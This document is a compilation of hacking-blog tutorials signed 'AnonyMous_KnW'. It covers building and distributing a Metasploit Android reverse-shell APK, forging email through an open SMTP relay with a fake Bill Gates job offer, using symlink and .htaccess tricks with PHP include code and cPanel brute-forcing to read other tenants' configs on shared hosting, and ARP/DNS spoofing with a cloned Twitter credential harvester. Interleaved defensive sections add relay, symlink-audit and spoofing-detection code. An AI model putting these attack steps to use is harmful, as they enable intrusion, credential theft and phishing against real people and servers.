Hacking Android Smartphone Tutorial


Hello Readers!

I am back with a new tutorial.

Nowadays the number of mobile users is increasing day by day, and the security threat is growing together with the number of users. Our tutorial for today is how to hack an Android smartphone using Metasploit. Why did we choose an Android phone for this tutorial? Simply because Android phones have lately been growing very fast worldwide. Here in China you can get an Android phone for only US$ 30, which is one of the reasons why Android is growing so fast.

What is Android?

According to Wikipedia:

Android is an operating system based on the
Linux kernel, and designed primarily for
touchscreen mobile devices such as
smartphones and tablet computers. Initially
developed by Android, Inc., which Google
backed financially and later bought in 2005,
Android was unveiled in 2007 along with the
founding of the Open Handset Alliance: a
consortium of hardware, software, and
telecommunication companies devoted to
advancing open standards for mobile devices.

And what is APK? According to Wikipedia:

Android application package file (APK) is the
file format used to distribute and install
application software and middleware onto
Google's Android operating system; very
similar to an MSI package in Windows or a
Deb package in Debian-based operating
systems like Ubuntu.

Here is some initial information for this tutorial:

Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443

Requirements:

1. Metasploit framework (we use Kali Linux in this tutorial)
2. Android smartphone (we use HTC One, Android 4.4 KitKat)

Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open a terminal (CTRL + ALT + T).
2. We will utilize Metasploit payload
framework to create exploit for this tutorial.

msfpayload android/meterpreter/
reverse_tcp
LHOST=<attacker_ip_address>
LPORT=<port_to_receive_connection>

As described above that attacker IP address is
192.168.8.94.

3. Because our payload is reverse_tcp where
attacker expect the victim to connect back to
attacker machine, attacker needs to set up the
handler to handle incoming connections to the
port already specified above. Type
msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will
use Metasploit handler
set payload android/meterpreter/
reverse_tcp –> make sure the payload

is the same with step 2

4. The next step we need to configure the
switch for the Metasploit payload we already
specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker
IP address
set lport 443 –> port to listen the
reverse connection
exploit –> start to listen incoming
connection

5. The attacker already has the APK file and will now start distributing it (I don't need to describe how to distribute this file, the internet is a good place for distribution).

6. Long story short, the victim (myself) downloads the malicious APK file and installs it.

7. This means that the attacker is already inside the victim's Android smartphone and can do everything with the victim's phone.

Conclusion:

1. Don't install APKs from unknown sources.

2. If you really want to install APKs from an unknown source, make sure you can view, read and examine the source code. The picture below is the source code of the malicious APK in this tutorial.

#AnonyMous_Knw

How to send fake emails


Hello Readers!!

This time I am going to show you how to send fake emails.
Sending fake emails is very easy. We will connect to the remote mail server and use the functions of the mail daemon running on the remote host to send the fake mails.
Anyway, first open the command prompt

(Start –> Run –> cmd)

and type

o www.mailserver.com 25

This establishes a remote connection to the port number 25 at mailserver.com 

After a successful connection, the SMTP information is displayed.

It's always a good idea to ask the mail daemon for help, so first issue HELP to see the supported commands.
Then we introduce ourselves to the mail daemon by issuing the

“HELLO”

command.
After a successful hello command, we input the sender email using the 'mail from:' command (without quotes). Then we enter the recipient's address using the 'rcpt to:' command (without quotes).
Now we enter our actual data using the DATA command. Within DATA, you can use the SUBJECT: command to enter the subject of the email.
Finally, we end our data by entering . (full stop) at the end. This sends the forged mail through that mail server.
Now let me show a session of email forging to make this clearer.
First, I open the command prompt and go to the telnet client by typing telnet.

Below is the session:

Microsoft Telnet>o www.mailserver.com 25

220 mailserver.com ESMTP

Sendmail Version
8.x.x; Mon, 28 Sept. 2008;

We do not allow to send fake or bulk emails…
hello microsoft.com
250 mailserver.com Hello Nice to meet you..

mail from:billgates@microsoft.com
250 billgates@microsoft.com Sender Ok
rcpt to:victim@victim.com
250 victim@victim.com Recipient Ok
data
354 Enter mail, end with “.” on a line by
itself..

SUBJECT:Hello!
Hello,
I am Bill Gates, the chairman of Microsoft. I
would like to offer you a job for Microsoft
Corporation. If you are interested to work with
Microsoft, then reply me at my mail address.
Regards~
Bill Gates
.
250 2.0.0 iF3NDLS240106 Message Accepted
For Delivery.
This was the session of sending the forged mail from billgates@microsoft.com to victim@mailsite.com.

I hope you understood the log. So this was my little tutorial on sending forged emails. The art of sending forged emails can be extended to send file attachments and to use multiple recipients.

Any positive or negative comment is heartily welcomed. I may extend this file into a bigger form (including ESMTP, file attachments, etc.).

Hope you liked this little basic tutorial on sending fake emails.

Extra Tips:

You can find out which ports are open and whether mail is enabled on any of those ports by doing an nmap scan of the website. SMTP is a very commonly open port and could be used to spoof emails, tricking site users into sending you their details or anything else needed.

#AnonyMous_KnW
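
The session above only works because the server accepts a recipient it is not responsible for from a client that never authenticated. As an added example (not part of the original post), here is the policy a correctly configured server applies at the MAIL FROM and RCPT TO stages; the function names, the local-domain set and the session lines are assumptions constructed for this sketch.

```python
import re

# "user@domain", with or without the angle brackets of an SMTP path.
ADDRESS = re.compile(r"<?([^<>\s@]+)@([^<>\s@]+)>?$")

# Constructed session modelled on the post's log: sender and recipient both
# belong to domains the server (mailserver.com) is not responsible for.
POST_SESSION = [
    "HELO microsoft.com",
    "MAIL FROM:billgates@microsoft.com",
    "RCPT TO:victim@victim.com",
    "DATA",
]


def _domain(line):
    """Domain of the address in a MAIL FROM: / RCPT TO: command, or None."""
    tokens = line.split(":", 1)[1].split()
    match = ADDRESS.search(tokens[0]) if tokens else None
    return match.group(2).lower() if match else None


def evaluate_session(client_lines, local_domains, authenticated=False):
    """Replay client commands and return [(command, reply_code), ...].

    authenticated=True stands for a client that passed SMTP AUTH or sits on
    a trusted submission network (how that is established is out of scope).
    """
    local = {d.lower() for d in local_domains}
    replies = []
    sender_ok = False
    accepted_rcpts = 0
    for raw in client_lines:
        line = raw.strip()
        verb = line.upper()
        if verb.startswith(("HELO", "EHLO")):
            code = 250
        elif verb.startswith("MAIL FROM:"):
            # An unauthenticated client may not claim one of our own domains.
            sender_ok = authenticated or _domain(line) not in local
            accepted_rcpts = 0
            code = 250 if sender_ok else 550
        elif verb.startswith("RCPT TO:"):
            if not sender_ok:
                code = 503                      # no valid MAIL FROM yet
            elif authenticated or _domain(line) in local:
                accepted_rcpts += 1
                code = 250
            else:
                code = 550                      # relaying denied
        elif verb == "DATA":
            code = 354 if accepted_rcpts else 503
        else:
            code = 500
        replies.append((line, code))
    return replies


if __name__ == "__main__":
    for command, code in evaluate_session(POST_SESSION, {"mailserver.com"}):
        print(code, command)
```

Relay control stops the server from being used against third parties; a forged sender addressed to one of the server's own mailboxes still has to be caught by SPF, DKIM and DMARC checks on the receiving side.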

Bypassing Symlink Methods On Linux ! Apache & Lite speed servers


Hello Readers
Today I am going to show you

BYPASSING SYMLINK METHODS: On LINUX |
APACHE AND LITESPEED SERVERS

Requirements:

Shelled Server
Writable .htaccess

Note :

This tutorial will not work for Godaddy ,
Bluehost , Hostgrator and Hostmonstor
Servers .

Tutorial:

Firstly You Need the Following Files For This
Method:
1 -> AnonyMous KnW CGI Shell
2 -> Anonknw
3 -> passwd-bypass.php
4 -> Turbo Brute force Cpanel
5 -> Port.py
First Before Starting to symlink we need to
create php.ini and ini.php to Disable Safe
mode and Disabled Functions on the server .
Use the Following Code :
Make a php.ini with the following code

safe_mode=Off
And ini.php with
PHP Code:
<?echo ini_get ( "safe_mode" );
echo ini_get ( "open_basedir" );
include( $_GET [ "file" ]); ini_restore ("safe_mode" )
;ini_restore ( "open_basedir" );
echo ini_get ( "safe_mode" );
echo ini_get ( "open_basedir" );
include( $_GET [ "ss" ]); ?>

Download link of the files used in this method
are on the end of the tutorial .
So after creating php.ini and ini.php upload
the other files to the server .
BYPASSING SYMLINK ON PLESK , DEBIAN ,
CENTOS & REDHAT SERVERS
Now i will explain how to bypass symlink on
Plesk , Debian , Centos and Redhat
Commonly all of the above have root path like

/root/var/www/vhost/

where all sites will be under vhost directory .
But you wont have permission to view it so we
will create a symbolic link to root and view the
site and symlink the config files
Make a new directory in your shell example
sen then upload AnonKnw folder Then
create a
symbolic link to root .

you can manually create a symlink to
root by using the command

ln -s / root

Then You will see this
$ linking: AnonKnw.txt -> /
finishing deferred symbolic links:
.txt -> /
This means a symbolic link has been created
to / root .
Now we need to upload .htaccess use the
following
PHP Code:
Options all
DirectoryIndex Sux.html
AddType text /plain .php
AddHandler server -parsed .php

Done Bypassed Now View

/var/www/vhost/

and you will be displayed with all sites .
BYPASSING SYMLINK ON APACHE AND
LITESPEED:

Mostly when you try to symlink apache
server you will face 403 forbidden or 404
not found and 500 Internel Server Error

These can be Bypass By Using
Different .htaccess individually.
BYPASSING SYMLINK ON APACHE &
LITESPEED – Linux Servers .

First for this make a new directory in your
shell example Anonknw then upload AnonKnW.sa
and .htaccess from the AnonyMous KnW CGI shell
which i added the download link at the end of
the Tutorial

After uploading .htaccess and AnonKnW.sa to a new
directory AnonknW chmod a AnonKnW.sa to 0755
Then Open the Cgi Shell Login
(   Password :-->   anonknw0755   )
Now there are several methods to bypass 403
forbidden You need to try all the following
methods . Atleast one will give you success .
Method 1 : .shtml method
This is the commonly used method by most of
the hackers to bypass 403 forbidden Error .
So before we procced first you need to get
all /etc/passwd from the server so that we
can find the username and path of where the
sites are located .

Server mostly Many functions are

enabled which shows 403 forbidden when you
try to read cat /etc/passwd from the server

so i made a Powerfull Shell which can bypass

and get /etc/passwd from the server.
(I add alredy  at the last of tutorial.)
Upload the /etc/passwd bypasser shell and
get all /etc/passwd
Then Login to AnonyMous CGI Shell and create
a symbolic link to your Target

Step 1 : ln -s / root

Step 2 : ln -s /home/username/public_html/
config.php 1.shtml

Example if our site is http://www.site.com
and username is site and its WordPress

ln -s /home/site/public_html/wp-config.php
1.shtml

So we created a Symbolic link to our Target
now you need to Go to Your Shell and Edit
the .htaccess with the following
PHP Code:
Options + FollowSymlinks
DirectoryIndex itti. html
RemoveHandler . php
AddType application / octet -stream .php

Once you done this Open the 1.shtml on your
Browser and rightclick and view source .
You
will be able to View the Config .
This is the common way of Bypass 403
forbidden and Litespeed .
Now Let Me Explain You the Advanced
Method.

Method 2 : Bypassing Symlinked Config From
Cpanel:

For This You need at least One Cpanel Access
on the sever .

I will tell you how to easily
crack Cpanel .

First Run This Command :

ls /var/mail

Then you will be displayed with all username
from the server Copy all .

Now Upload Turbo Brute Force Cpanel Script
( i attached it at last of Tutorial).

Open the Script and in User Paste all the
username we got

And for Password here is the wordlist Here :

Copy All and Paste it on Password Select
Simple and Click Submit
If Your lucky you will be displayed with
cracked cpanels.
Once you got a cpanel on the server

You can
Bypass 500 Internel Server Error 403
Forbidden Error From Port :2077 and From

error-pages from file manager.
Just symlink the config

ln -s /home/user/public_html/wp-config.php
config.shtml

Login to the cpanel

Then Go to File Manager -> Error Pages

Then Choose any of these according to what
error is triggered when you open your

symlinked config

400 (Bad request)
401 (Authorization required)
403 (Forbidden)
404 (Not found)
500 (Internal server error)
Example “&file=400.shtml&desc=(Bad
request)

we can get the config by

“&file=config.shtml& desc=(Bad request)

BYPASS SYMLINK FROM PORT 2077
So once you Symlinked the Config You can
just login to port 2077

Then public_html/path/config.shtml

You will be able download the config.shtml
and you can view the source .

Method 3 : Symlink Bypass via Open Port
using Python
For this First we Python to be Installed on
Server.

To check if Python is installed run this

command python -h

If its install we can use the following python
script and Bypass

#!/usr/bin/env python
# Made in AnonKnw Labs
import SimpleHTTPServer
import SocketServer
import os
port = 13123
if __name__==’__main__':
os.chdir(‘/’)
Handler =
SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer((“”, port),
Handler)
print(“Now open this server on webbrowser at
port : ” + str(port))
print(“example: http://site.com :” + str(port))
httpd.serve_forever()

I have added the script to downloads. Now
Upload the script to the shell.
Now run this command :

python port.py

Now Open the site with port 13123

http://www.site.com:13123

Server Bypassed From Open Port .

Method 4 : Bypassing Symlink Using .ini
Method.
Login to AnonyMous KnW CGI shell normally create a
symlink to your target in .ini Extension .

ln -s /home/user/public_html/wp-config.php
config.ini

Now go to the shell and make a new file
a.shtml
Paste the following code inside it and save it

PHP Code:
<!-- #include virtual="config.ini"-->

and save it .
Now open the a.shtml in the browser and
right click and view the source . Done
Bypassed
Method 5 : Bypassing Symlink Using ReadMe
file.
Make a new directory in your shell From the
Cgi shell normally symlink the config

Code:
ln -s /home/user/public_html/config.php
config.txt

now make .htaccess with the following code .

PHP Code:
.htaccess
Options All
ReadMeName config .txt

Now when you open the directory on the
browser you will be displayed with the config
source directly .
eg : site.com/Anonknw/config.txt is your symlinked
config then when you open
http://www.site.com/AnonKnw/ you symlinked
config will be displayed as a ReadMe content .
Thats it i have explain All the Methods to
Bypass Symlink If you will have problem
Bypassing Try all the Following .htaccess

1 – >
PHP Code:
.htaccess
Options Indexes FollowSymLinks
DirectoryIndex ss.htm
AddType txt . php
AddHandler txt . php
2 ->
PHP Code:
.htaccess
Options All
DirectoryIndex ssss. html
addType txt . php
AddHandler txt . php< IfModule mod_
security .c >SecFilterEngine Off
SecFilterScanPOST Off </ IfModule>

3 ->
PHP Code:
.htaccess
suPHP_ConfigPath / home/ user/ public_html /
php. ini

4 ->
PHP Code:
.htaccess
Options + FollowSymLinks
DirectoryIndex Sux.html
Options + Indexes
AddType text /plain .php
AddHandler server -parsed .php
AddType text /plain .html

5 -> .htaccess

Options Indexes FollowSymLinks
DirectoryIndex ss.htm
AddType txt . php
AddHandler txt . php< IfModule mod_
autoindex .c > IndexOptions
FancyIndexing
IconsAreLinks
SuppressHTMLPreamble</ ifModule>
< IfModule mod_security .c > SecFilterEngine Off
SecFilterScanPOST Off </ IfModule>
.HTACCESS TO BYPASS DISABLED FUNCTIONS

This one is to make python work :
PHP Code:
.htaccess
AddType
application /x -httpd -cgi . py
AddHandler cgi - script . py
AddHandler cgi - script . py

This one is to make perl work :

PHP Code:
.htaccess
AddType application / x- httpd- cgi .pl
AddHandler cgi - script . pl
AddHandler cgi - script . pl

This one is to enable Symlink if the function is
disabled in the server :

PHP Code:
.htaccess< Directory "/home" > *** Options -
ExecCGI * ***AllowOverride
AuthConfig Indexes
Limit FileInfo
Options= IncludesNOEXEC ,Indexes ,Includes ,
MultiViews ,SymLinksIfOwnerMatch ,
FollowSymLinks</ Directory>

This one is to retrieve users permissions :

PHP Code:
.htaccess
AddType text /plain .php
Options + Indexes
DirectoryIndex filename .html

Bypass Internal Server error :

PHP Code:
.htaccess< IfModule mod_security . c>
SecFilterEngine Off SecFilterScanPOST Off </
IfModule>
Change php version:
PHP Code:
.htaccess
AddType application / x- httpd- php4 .php

Bypass Uploads Options and upload shell in
another extension :
PHP Code:
< FilesMatch "^.*.mp3" > SetHandler
application /x -httpd -php </ FilesMatch>

Retrieve Config with picture method :

PHP Code:
.htaccess
Options FollowSymLinks MultiViews Indexes
ExecCGI
AddType application / x- httpd- cgi .gif
AddHandler cgi - script . gif
AddHandler cgi - script . gif

So that’s it i think i had covered everything
thats related to Bypass Symlink and Disabled
Functions on Server .
DOWNLOAD THE SCRIPTS I HAVE USED ON
THE TUTORIAL >>Here<<
Password of zip:- ([[[[[anonknw]]]]])
(Without braces)

Hope U Enjoy Reading

Regards

AnonyMous Knw

How to Symlink On A Server


Hello Readers!
In this tutorial I am going to show you

How to Symlink On A Server

What is Symlink ?
Symlink is a method used by hackers to read
files from other users on a linux server, only
by using a php-shell.
So what do we require to start the tutorial :
Requirements :
- a phpshell uploaded in a linux server (Safe
MODE = OFF )
- a target site
- basic phpshell & linux knowledge
- a brain !
Let's start by the tutorial.
Where to get a target, if you only have a
phpshell uploaded in a linux server that has
some sites ?
It's easy , first get the IP of the server.
Then go to bing.com and search like that :
Code:
ip:xx.xxx.xxx.xxx vbulletin
xxx replace with the ip adress of the server ,
and 'vbulletin', you can change to a name of a
forum software or a CMS you wish as a
target. But for this example i'll take vBulletin.
OK , now we got the target site , let's suppose
that its domain name is mytarget.com and it
uses vBulletin forum software.
Now starts the real hacking !
Go to your phpshell , and in the 'Execute
command' field , execute there that
command :
Code:
ls -la /etc/valiases/mytarget.com
By executing this command , i'll get the name
of the user (on the linux server) that keeps
the website mytarget.com.
It should return with a result similar to that :
>>>>>>>-rw-r--r-- 1 target mail 28 May 28
2011 /etc/valiases/mytarget.com
The red colored piece is the user of
mytarget.com on the server.
So in our case the username is 'target '
Many of us know that the configuration file of
vBulletin script ,can be found in /includes/
config.php.
This is the file we need to read in our case ,
in order to get access at our target site.
How can we read that file ?
Simple , execute that command on the shell :
Code:
ln -s /home/target/public_html/includes/
config.php symlink.txt
As you can see, we're writing the content of config.php into the symlink.txt file.
After you execute the command, you will see a new file called symlink.txt.
Open it and w00t !! You successfully read the
configuration file (symlinked).
Now , just get an MySQL connector script
coded in PHP , and login with the details you
get from configuration file of your target.Then
at the admin table, get the admin's hash and
crack it , or better , change the admin's email
you yours , and then do a forgot password at
mytarget.com
And then you successfully will get full access
in your target site !
That was all ,very easy if you practice many
times. Maybe soon i will make a video tutorial
if you still didn't understand , just request the
video tut in the comments , and i will try
ASAP to make it for you !

Hope You Enjoyed!

#AnonyMous_Knw
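
Both symlink posts above leave the same traces on a shared host: symbolic links inside a web root that resolve outside it, and a tenant-writable .htaccess that switches on symlink following or remaps handlers. The following audit script is an added example for administrators, not code from the original posts; the directory layout, file names and category labels are constructed assumptions.

```python
import os
import re
import tempfile

# Option names that enable symlink following, SSI or CGI from .htaccess.
ENABLING_OPTIONS = {"all", "followsymlinks", "includes", "execcgi"}
DIRECTIVE_CATEGORY = {
    "addtype": "handler", "addhandler": "handler",
    "removehandler": "handler", "sethandler": "handler",
    "readmename": "readme", "suphp_configpath": "php-ini",
    "secfilterengine": "waf",
}

# Constructed .htaccess content for the demonstration tree.
SAMPLE_HTACCESS = """\
Options +FollowSymLinks
DirectoryIndex index.html
RemoveHandler .php
AddType text/plain .php
Options -Indexes
"""


def audit_htaccess(text):
    """Return (line_no, category, directive) for directives to review."""
    findings = []
    for number, raw in enumerate(text.splitlines(), 1):
        # Tolerate "Options + FollowSymlinks" (space after the sign).
        line = re.sub(r"([+-])\s+", r"\1", raw.strip())
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        name = parts[0].lower()
        if name == "options":
            enabled = {p.lstrip("+").lower() for p in parts[1:]
                       if not p.startswith("-")}
            if enabled & ENABLING_OPTIONS:
                findings.append((number, "options", line))
        elif name in DIRECTIVE_CATEGORY:
            findings.append((number, DIRECTIVE_CATEGORY[name], line))
    return findings


def audit_symlinks(docroot):
    """Return (relative_link, resolved_target, reasons) for suspicious links."""
    root = os.path.realpath(docroot)
    findings = []
    for dirpath, dirnames, filenames in os.walk(docroot, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            reasons = []
            if os.path.commonpath([root, target]) != root:
                reasons.append("escapes-docroot")
            try:
                # The comparison SymLinksIfOwnerMatch makes: link vs target owner.
                if os.lstat(path).st_uid != os.stat(path).st_uid:
                    reasons.append("owner-mismatch")
            except OSError:
                reasons.append("unresolvable")
            if reasons:
                findings.append((os.path.relpath(path, docroot), target, reasons))
    return sorted(findings)


def build_constructed_tree():
    """Create a throw-away tree: one tenant linking into another's web root."""
    base = tempfile.mkdtemp(prefix="symlink-audit-")
    docroot = os.path.join(base, "tenant_a", "public_html", "sym")
    other = os.path.join(base, "tenant_b", "public_html")
    os.makedirs(docroot)
    os.makedirs(other)
    for path, body in ((os.path.join(other, "wp-config.php"), "<?php // constructed\n"),
                       (os.path.join(docroot, "index.html"), "ok\n"),
                       (os.path.join(docroot, ".htaccess"), SAMPLE_HTACCESS)):
        with open(path, "w") as handle:
            handle.write(body)
    os.symlink(os.path.join(other, "wp-config.php"), os.path.join(docroot, "1.shtml"))
    os.symlink("/", os.path.join(docroot, "root"))
    os.symlink("index.html", os.path.join(docroot, "home.html"))  # stays inside
    return docroot


if __name__ == "__main__":
    tree = build_constructed_tree()
    for finding in audit_symlinks(tree):
        print("symlink:", finding)
    for finding in audit_htaccess(SAMPLE_HTACCESS):
        print(".htaccess:", finding)
```

On the server itself, the matching hardening is to restrict `AllowOverride` so tenant .htaccess files cannot set `Options` or handlers, and to keep each account's files unreadable to other accounts. Apache's documentation notes that the symlink options are subject to race conditions and should not be treated as a security restriction on their own.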

How To Do DNS Spoofing In Kali Linux Using Ettercap


Hello Readers!!!

This time I am going to show you

"How to do DNS spoofing in Kali Linux using Ettercap"

Ettercap is a free and open source network
security tool for man-in-the-middle attacks
on LAN. It can be used for computer network
protocol analysis and security auditing. It
runs on various Unix-like operating systems
including Linux, Mac OS X, BSD and Solaris,
and on Microsoft Windows. It is capable of
intercepting traffic on a network segment,
capturing passwords, and conducting active
eavesdropping against a number of common
protocols.

1 - LAUNCH ETTERCAP
Open a root terminal and enter the command
ettercap -G to launch the graphical interface
of ettercap.
Once ettercap is open, select the 'Unified
Sniffing ' option under the 'Sniff ' menu.
Now, select your network interface and then
click 'OK.'
WIFI = wlan0, Ethernet = eth0 | I am using wifi
so I will select wlan0 and click OK.
2 - TARGET HOSTS
Now it is time to target our hosts. To begin
this, select the " Scan for Hosts" option under
the " Hosts" menu, or just press Ctrl + S. It will
scan the hosts on your provided network
interface, and display how many were found in
the Logging box on the bottom. In my case,
4
hosts added to the hosts list...
Now, open the Hosts List by selecting Hosts
List under "Host" menu, or just press H.
Next - Select the default gateway and click
"Add to Target 1." My default gateway is
192.168.1.1 . After that, select the host of the
VICTIM who you are going to perform the
attack on. My victim will be my Galaxy Note 3
(connected to my wifi). This works for any
device on your network. Ok, so the IP address
of my victim host is 192.168.1.14 . I will select
this host and then click "Add to Target 2."

Ok, now select Current Targets under the
Targets menu, or just press "T" on your
keyboard. It will now show you the current
targets. If you followed the last step correctly,
your default gateway will be on one side, and
victim host on the other.
ARP POISONING
First, I am going to show you how to ARP
poison. We do this for all of the other mitm
attacks. Ok, so once you have your targets,
Simply select "Arp poisoning" off of the "Mitm"
menu. Next, select " Sniff remote connections"
and click OK.
Great, now we just need to do one more thing
to start the ARP poisoning. Select "Start
Sniffing" off of the "Sniff" menu, or you can
just use the shortcut: CTRL + W.
Now, you have ARP poisoned the victim! You
will now receive information as they log in to
sites. Example - I am going to log in to
Gmail.com on my phone and Ettercap
will show the login information in the logging
area. Now, as you see in the image below, we
have my username and password to HF :D. It
will sniff all logins.
The second Man in the Middle (Mitm) attack
I'm going to show you is DNS SPOOFING.
Here is the definition of DNS Spoofing, taken
from Wikipedia .
DNS spoofing is a computer hacking attack,
whereby data is introduced into a Domain
Name System name server's cache database,
causing the name server to return an incorrect
IP address, diverting traffic to another
computer.
Basically, DNS spoofing is like this scenario:
Attacker does a dns spoofing attack to replace
http://twitter.com with http://192.168.1.4

(THE ATTACKERS' TWITTER PHISHER). Having
done this, if the victim visits twitter.com, it
will show the ATTACKERS' phisher instead of
real twitter.
Alright, so before we can dns spoof, you need
to configure a file called etter.dns . In Kali
Linux, this file is located in /usr/share/
ettercap/etter.dns. If it is not, no problem -
you can find it the file by running the
following command in terminal:
" locate etter.dns "

Alright, now we will open etter.dns in any type
of text editor. I am just going to use nano, by
entering the following commands:
cd usr/share/ettercap
nano etter.dns
Now, etter.dns will be open in nano terminal
text editor.
Take note that your etter.dns should be full of
text, mine isn't because I have done this
before. Next, delete all of the text in this file.
You can't do ctrl + A in terminal, so it might
be a little faster/easier to open this file in a
editor such as LeafPad, and edit it there.
Alright, now I have etter.dns open in nano
terminal text editor

Ok, so this file tells what we are going to DNS
spoof.

What we will do is enter the following:
twitter.com A 192.168.1.4
This will dns spoof twitter.com to 192.168.1.4
(which is going to be my credential harvester
for twitter).

If you wanted, you could enter multiple lines
like this:
twitter.com A 192.168.1.4
facebook.com A 74.125.225.41
myspace.com A 199.59.149.230
This would dns spoof twitter.com to
192.168.1.4 , facebook.com to
74.125.225.41 (Google), and myspace.com to
199.59.149.230 (Twitter). Or, you could just
put an asterisk which means it will spoof ALL
websites to your desired ip:
* A 192.168.1.4

I am just going to spoof Twitter for this
tutorial, so in etter.dns I am going to delete
everything and just enter twitter.com A
192.168.1.4 . Save the file. If you're using
nano, you can save it by pressing Ctrl + X,
then Y, then press enter.
Great, now etter.dns is ready. I spoofed twitter
to 192.168.1.4 which is going to be my
credential harvester.

To create a credential
harvester, launch the SET framework by
entering the command: se-toolkit . **If you
wish to simply spoof it to an IP other than
your phisher then skip this step :) **
Now, enter 1 for Social-Engineering Attacks.
Secondly, enter 2 for Website Attack Vectors.
Finally, enter 3 for Credential Harvester Attack
Method.
Alright, now enter 2 for site cloner.
Next, enter the YOUR local ip (find it with
ifconfig). mine is 192.168.1.4 , so i'll enter
192.168.1.4 .
Now, it wants you to enter the URL you wish
to clone. I am going to make a fake twitter, so
I enter http://www.twitter.com . Now we are
done with that part.
NOW, it is time to conduct the DNS SPOOFING
attack. Go back to ettercap and make sure you
are NOT ARP POISONING anymore (If you tried
that attack) by clicking "Stop Mitm Attacks"
under the Mitm menu.
Ok, now select "Manage the Plugins" under the
Plugins menu, or just press the shortcut "CTRL
+P"
Last but not least, click Start Sniffing under
the sniff menu, or just press ctrl + W (IF YOU
ARE NOT ALREADY SNIFFING)
Now, I will go to twitter.com on the victim
device, and it would take me to twitter.com -
BUT this is not the real twitter - it's the
attacker's fake twitter! if i were to login, i'd
receive the credentials in the SET window.
Also, you can use "Filters" on Ettercap (this is one of my favorites) , which allow you to
customly filter packets.

#AnonyMous_KnW
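
Both attacks in the post above are visible from the victim's side: ARP poisoning makes the gateway's IP address suddenly map to another host's MAC address, and the etter.dns entry makes a public name resolve to a private LAN address. The following detection sketch is an added example, not part of the original post; it reuses the post's addresses (gateway 192.168.1.1, attacker 192.168.1.4), while the MAC addresses, the `ip neigh` snapshots and the internal-suffix list are constructed assumptions.

```python
import ipaddress

GATEWAY = "192.168.1.1"   # gateway address used in the post

# Constructed `ip neigh` output from the victim host; all MACs are made up.
BEFORE = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.4 dev wlan0 lladdr de:ad:be:ef:00:04 STALE
"""
AFTER = """\
192.168.1.1 dev wlan0 lladdr de:ad:be:ef:00:04 REACHABLE
192.168.1.4 dev wlan0 lladdr de:ad:be:ef:00:04 REACHABLE
192.168.1.9 dev wlan0  FAILED
"""


def parse_ip_neigh(text):
    """Map IP -> MAC for every neighbour entry that has a link-layer address."""
    table = {}
    for line in text.splitlines():
        parts = line.split()
        if "lladdr" in parts:
            table[parts[0]] = parts[parts.index("lladdr") + 1].lower()
    return table


def detect_arp_poisoning(snapshots, gateway_ip):
    """Compare successive neighbour tables and report poisoning indicators."""
    findings = []
    last_gateway_mac = None
    for table in snapshots:
        mac = table.get(gateway_ip)
        if mac and last_gateway_mac and mac != last_gateway_mac:
            findings.append(("gateway-mac-changed", last_gateway_mac, mac))
        if mac:
            last_gateway_mac = mac
        # One MAC answering for several IPs: the attacker's interface is
        # impersonating another host (proxy ARP can cause this legitimately).
        by_mac = {}
        for ip, entry_mac in table.items():
            by_mac.setdefault(entry_mac, []).append(ip)
        for entry_mac, ips in by_mac.items():
            if len(ips) > 1:
                findings.append(("mac-shared", entry_mac, tuple(sorted(ips))))
    return findings


def suspicious_dns_answers(answers, internal_suffixes=(".lan", ".local"),
                           wildcard_threshold=3):
    """Flag (name, ip) answers that look like LAN-level DNS spoofing."""
    findings = []
    names_by_ip = {}
    for qname, ip in answers:
        name = qname.rstrip(".").lower()
        internal = name.endswith(tuple(internal_suffixes))
        if not internal and ipaddress.ip_address(ip).is_private:
            findings.append(("public-name-private-address", name, ip))
            names_by_ip.setdefault(ip, set()).add(name)
    # Many unrelated public names on one private address matches the
    # wildcard entry ("* A <ip>") described in the post.
    for ip, names in names_by_ip.items():
        if len(names) >= wildcard_threshold:
            findings.append(("many-names-one-address", ip, tuple(sorted(names))))
    return findings


if __name__ == "__main__":
    tables = [parse_ip_neigh(BEFORE), parse_ip_neigh(AFTER)]
    for finding in detect_arp_poisoning(tables, GATEWAY):
        print(finding)
    print(suspicious_dns_answers([("twitter.com", "192.168.1.4")]))
```

This only detects the attack from a host; on managed switches, Dynamic ARP Inspection combined with DHCP snooping drops the forged ARP replies at the port.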

How To Install TOR In Any Linux Distro


Hello all Readers!
Today I am going to share a tutorial on how to install TOR in any Linux distro.

OK, first of all copy the bash code below and save it as Torinstall.sh on your Desktop.

Code:
#!/bin/sh
# Run as root on a Debian-based system (the script uses apt).
# "wheezy" is the Debian release this script was written for.
echo "deb http://deb.torproject.org/torproject.org wheezy main" >> /etc/apt/sources.list
clear
echo "Tor Installer"
echo "Installing the keys...."
# Short key IDs can collide; the export below uses the full fingerprint.
gpg --keyserver keys.gnupg.net --recv-keys 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo "Ready!!"
clear
echo "Updating Repositories...."
apt-get update
clear
echo "Installing TOR"
apt-get install deb.torproject.org-keyring
apt-get install tor
echo "Ready!!"
echo "Installing Vidalia"
apt-get install vidalia
echo "Ready!!"
echo "Installing iceweasel-torbutton"
apt-get install iceweasel-torbutton
echo "Ready!!"
clear
echo "Installing Privoxy"
apt-get install privoxy
echo "Configuring privoxy"
# Forward all Privoxy traffic to Tor's local SOCKS port.
echo "forward-socks5 / 127.0.0.1:9050 ." >> /etc/privoxy/config
echo "Ready!!"
service tor restart
service privoxy restart
echo "Tor has been installed successfully."
echo "Enjoy The Anonymity!!!"

OK, now run Torinstall.sh in a terminal and let it install ^_^
After installation, open a terminal and type:

Code:
/etc/init.d/tor start
/etc/init.d/privoxy start
or
service tor start
service privoxy start

Now go to Applications > Internet > Vidalia and check that it says it is connected to the Tor network ^_^

Now download the auto proxy add-on for Firefox.

Set the auto proxy to TOR and you are done.

Enjoy The Anonymity!!

#AnonyMous_Knw

Hacking A Website Using ASP/ASPX Injection


Hello!
This time I am posting about ASPX injection.
Now let's start.

====================================================================================================================

ASPX injection is similar to PHP-based SQL injection. But here, we don't use queries that contain order by, union select etc. Instead, we will trick the server into responding with the information we need. It is an error-based injection technique: we get the information in the form of errors.
=============================
